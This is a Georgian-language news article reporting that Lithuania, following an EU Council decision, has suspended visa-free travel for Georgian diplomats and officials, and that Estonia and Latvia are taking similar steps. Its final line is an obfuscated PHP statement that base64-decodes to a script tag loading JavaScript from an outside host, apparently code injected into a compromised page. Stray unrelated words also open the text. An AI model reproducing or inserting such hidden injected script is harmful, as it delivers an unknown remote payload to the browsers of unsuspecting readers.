gorgia
jaluzi

ლიეტუვამ ქართველი დიპლომატებისა და ოფიციალური პირებისთვის უვიზო მიმოსვლა შეაჩერა - ამის შესახებ ინფორმაციას DELFI.lt ავრცელებს.

კერძოდ, დიპლომატიური და სამსახურებრივი პასპორტების მქონე საქართველოს მოქალაქეებს, რომლებიც ლიეტუვაში ევროკავშირის გარე საზღვრის გავლით შედიან, ვიზა დასჭირდებათ.

ქვეყნის მთავრობამ 21 მაისს დაამტკიცა რეგულაცია, რომელიც ქართველი დიპლომატებისა და თანამდებობის პირებისთვის უვიზო რეჟიმის შეჩერების შესახებ ევროკავშირის საბჭოს მიერ იანვარში მიღებული გადაწყვეტილების რეალიზებას ითვალისწინებს.

კერძოდ, ევროკავშირის გადაწყვეტილებით, ქართველი დიპლომატები და თანამდებობის პირები, ასევე, მათი ოჯახის წევრები ევროკავშირში მოკლევადიანი ვიზიტით უვიზო მოგზაურობას ვეღარ შეძლებენ და უფლება აღარ ექნებათ, გრძელვადიანი ვიზების მისაღებად განაცხადის უფრო მარტივი და იაფი პროცედურით ისარგებლონ.

საქართველოს რიგით მოქალაქეებს შეზღუდვა არ ეხებათ და ევროკავშირში უვიზო მოგზაურობას კვლავ შეძლებენ.

ლიეტუვის მთავრობამ საგარეო საქმეთა სამინისტროს დაავალა, ევროკომისიას და თანამეგობრობის სხვა წევრებს ცვლილებების შესახებ ხუთი სამუშაო დღის ვადაში აცნობოს.

ცნობისთვის: მანამდე, 8 მაისის გადაწყვეტილებით ქართული დიპლომატიური პასპორტების მფლობელებისთვის უვიზო რეჟიმი ესტონეთის მთავრობამაც გააუქმა. ესტონეთის საგარეო უწყების ცნობით, „დიპლომატიური და სამსახურებრივი პასპორტების მფლობელებისთვის სავიზო რეჟიმის შემოღება კიდევ ერთი ნაბიჯია იმის საჩვენებლად, რომ საერთაშორისო საზოგადოება, მათ შორის, ევროკავშირი საქართველოს მმართველი პარტიის, „ქართული ოცნების“ მიერ რიგითი ადამიანების, დემონსტრანტებისა და ჟურნალისტების წინააღმდეგ რეპრესიებს, პოლიციის დაუსჯელობასა და სამოქალაქო საზოგადოების ჩახშობას არ ეთანხმება.“

ასევე, 9 მაისს საქართველოში ლატვიის ელჩმა, ედიტე მედნემ განაცხადა, რომ დიპლომატიური პასპორტების მფლობელი საქართველოს მოქალაქეებისთვის უვიზო რეჟიმის აკრძალვას ლატვიაც აპირებს, რაც ერთ თვეში ან ოდნავ მეტ დროში მოხდება.

152
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");